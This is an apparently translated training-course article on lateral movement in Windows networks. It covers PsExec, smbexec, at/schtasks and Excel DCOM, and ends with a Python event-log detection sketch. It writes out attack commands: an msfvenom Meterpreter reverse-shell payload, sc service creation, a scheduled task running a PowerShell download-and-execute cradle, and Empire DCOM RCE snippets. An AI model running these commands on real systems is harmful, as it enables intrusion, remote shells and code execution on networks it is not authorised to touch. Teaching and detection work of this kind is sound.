movement in the attacked network

From the point of view of hacking theory, attacking an infrastructure consists of several steps. First, the attacker conducts reconnaissance: finding out which DNS records, IP address pools, and so on belong to the target organization. It is also useful to learn what software and security tools are in use. All of this can make the subsequent attack much easier.

After successfully penetrating the victim's network, the hacker needs to gain a foothold; to do this, the attacker creates a hidden channel into the compromised network. This could be encapsulating the desired data in a common packet type, using common ports, steganography, and much more. Also, if the hacker does not have sufficient rights, he needs to escalate privileges.

Finally, having established a foothold in the network and obtained the necessary rights, the hacker can begin horizontal (lateral) movement: moving through the network from the entry point (for example, a compromised device or account) to other objects. This is the topic of this article.

Windows as a springboard

In most organizations today, the main user OS is still Windows. Therefore, in this article we will look at horizontal movement in a Windows-based network.

Let's start by looking at one of the most common methods of movement – using psexec. The Microsoft website describes the utility as follows: “PsExec is a lightweight telnet replacement that allows you to run processes on other systems with full interoperability for console applications without manually installing client software.”

PsExec uses the SMB protocol. The utility copies the PSEXESVC.exe executable to the target's ADMIN$ share, then creates a service via RPC which, in turn, launches PSEXESVC.exe on the attacked host.

This file then creates a named pipe through which it communicates with the attacker's machine. When the work is complete, the service is stopped and the file is deleted from the attacked machine.

To carry out this attack in practice we will use Kali Linux; first we prepare a reverse_https payload with msfvenom.

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.105 lport=443 -f exe > shell.exe

Next, we copy the executable to the ADMIN$ share, although it could be placed anywhere in the file system where it will stay unnoticed.

After that, using the sc command, which can query, create and delete Windows services remotely, we create a service, for example named “Meterpreter”, that points to the uploaded executable.

sc create Meterpreter binPath= "shell.exe"

sc start Meterpreter

The last step is starting the service. This ends with an error, because the file we created is not a genuine service executable and does not return the expected response code: Windows service executables have a slightly different format and must be started in a special way. In this case the error does not matter, since the main goal, executing our file, has already been achieved.

Smbexec as an alternative

Smbexec is a tool for remotely executing commands on Windows systems. It is similar to PsExec but avoids placing any malicious files on the target system: it creates a temporary service on the target machine that executes commands through cmd.exe, without dropping any binaries. Although this approach is stealthier, the tool generates an event log entry for every command executed, and offers only a sort of non-interactive “shell”.

So, the command to connect using Smbexec looks like this:

smbexec.py WORKGROUP/user:password@192.168.1.1

An important advantage of Smbexec is that commands are executed directly through the service, eliminating the need for an executable file on the target machine's disk.

This method is useful for executing one-off commands on Windows. For example, pairing it with the web_delivery module from Metasploit allows you to run a Meterpreter payload via PowerShell.

By creating a service on the remote target machine whose binPath runs the supplied command via cmd.exe, the payload is executed.

Here you can create and start a service using the following commands:

sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"

sc start [ServiceName]

Using At and Schtasks

The at command in Windows allows you to schedule tasks on hosts for which you know valid credentials (a username with its password or hash). Thus, at can also help us execute commands on other hosts.

Here we use the task scheduler to run a task at a given time. For example:

at \\victim 23:00 "shutdown -r"

As a result, a pre-uploaded executable can be started on the victim's machine. Neither this command nor schtasks, described below, offers significant advantages in terms of hiding activity. But it is a standard utility that is available in any version of the OS, and accordingly it can also be used to launch applications.

The schtasks utility works on the same principle, but here we first create a task and then run it:

schtasks /create /tn <TASK_NAME> /tr C:\path\shell.exe /sc once /st 00:00 /S <VICTIM> /RU System

schtasks /run /tn <TASK_NAME> /S <VICTIM>

In the example below we again first create a task, this one running PowerShell code that downloads a script from another host, and then run the created task.

schtasks /create /S dcorp-dc.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1'')'"

schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Using Excel DCOM objects

Whereas the previous Lateral Movement methods relied on built-in OS commands, we will now look at using Excel DCOM objects. The Distributed Component Object Model (DCOM) is an extension of the Component Object Model (COM) standard that supports communication between objects on different computers over a network.

The Empire project provides a PowerShell script that demonstrates using Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script, available in the Empire repository on GitHub, demonstrating different ways of using Excel for RCE:

# Detect the MS Office version (x86 or x64) on the remote host
elseif ($Method -Match "DetectOffice") {
    # Resolve the Excel.Application COM class on the remote computer and instantiate it over DCOM
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $isx64 = [boolean]$obj.Application.ProductCode[21]
    Write-Host  $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}

# Register an XLL add-in (the DLL is loaded by the remote Excel process)
elseif ($Method -Match "RegisterXLL") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $obj.Application.RegisterXLL("$DllPath")
}

# Execute commands via Excel DDE
elseif ($Method -Match "ExcelDDE") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $Obj.DisplayAlerts = $false   # suppress dialogs that would otherwise block the call
    $Obj.DDEInitiate("cmd", "/c $Command")
}

In this way, Excel can be used to execute arbitrary commands on the remote host.
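As an added defender-side example, not code from the original article or from any of the tools it describes, the following Python sketch turns the traces these techniques leave (the PSEXESVC service that PsExec installs, a service whose binPath is cmd.exe as with smbexec and the sc create example, a scheduled task whose action is a PowerShell download cradle as in the schtasks example, and cmd.exe started by Excel as the DCOM method does) into detection rules over Windows event records. The event IDs 7045, 4698 and 4688 are real; the flattened field layout, host names and sample records are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample records, not real log output. Field names follow the real events
# (7045: ServiceName/ImagePath, 4688: ParentProcessName/NewProcessName); "Command" for
# 4698 is assumed to be the <Command> element pulled out of the task's XML (TaskContent).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "7045", "host": "WS01", "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": "7045", "host": "WS01", "ServiceName": "Meterpreter", "ImagePath": r"C:\Windows\shell.exe"},
    {"id": "7045", "host": "WS02", "ServiceName": "BTOBTO", "ImagePath": r"cmd.exe /c whoami > C:\Windows\Temp\o.txt"},
    {"id": "7045", "host": "WS02", "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"id": "4698", "host": "DC01", "TaskName": r"\MyNewtask",
     "Command": "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(...)'"},
    {"id": "4698", "host": "DC01", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "Command": r"%windir%\system32\defrag.exe"},
    {"id": "4688", "host": "WS03", "ParentProcessName": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE", "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"id": "4688", "host": "WS03", "ParentProcessName": r"C:\Windows\explorer.exe", "NewProcessName": r"C:\Windows\System32\cmd.exe"},
]

SHELL_RE = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe\b", re.I)
WINROOT_RE = re.compile(r"^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.I)  # file dropped at the ADMIN$ root
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|\biex\b|Invoke-Expression|FromBase64String", re.I)
OFFICE_RE = re.compile(r"\\(EXCEL|WINWORD|POWERPNT)\.EXE$", re.I)


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event triggers (empty list = nothing suspicious)."""
    hits: List[str] = []
    if ev["id"] == "7045":  # System log: a new service was installed
        path = ev.get("ImagePath", "")
        if ev.get("ServiceName", "").upper() == "PSEXESVC":
            hits.append("psexec-service")
        if SHELL_RE.search(path):  # the "service" is really a shell command (smbexec, sc ... cmd.exe /c)
            hits.append("service-binpath-is-shell")
        elif WINROOT_RE.match(path):  # loose binary sitting directly in C:\Windows (ADMIN$)
            hits.append("service-binary-in-windows-root")
    elif ev["id"] == "4698" and CRADLE_RE.search(ev.get("Command", "")):  # scheduled task created
        hits.append("task-with-download-cradle")
    elif ev["id"] == "4688" and OFFICE_RE.search(ev.get("ParentProcessName", "")) \
            and SHELL_RE.search(ev.get("NewProcessName", "")):  # an Office process spawned a shell
        hits.append("office-spawned-shell")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group triggered rules by host; hosts with no hits are omitted."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(ev["host"], []).append(rule)
    return findings
```

Run `scan(SAMPLE_EVENTS)` to see which constructed hosts trip which rule; the benign Spooler, Defrag and explorer records produce no hits.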

Conclusion

Lateral Movement is an integral part of any successful attack. To move between systems, an attacker needs to be able to execute code on other systems, and in this article we looked at several methods of doing so.


OTUS experts talk more about information security tools and methods in practical online courses. You can view the full catalog of courses via the link.

And for those who are interested in the topic of government regulation mechanisms in information security, I recommend attending the open lesson on October 24. Here you will get acquainted with the mechanisms of state regulation in information security: licensing, accreditation, certification and attestation. You will understand how to apply this knowledge in your work to comply with legal requirements. You can sign up here.
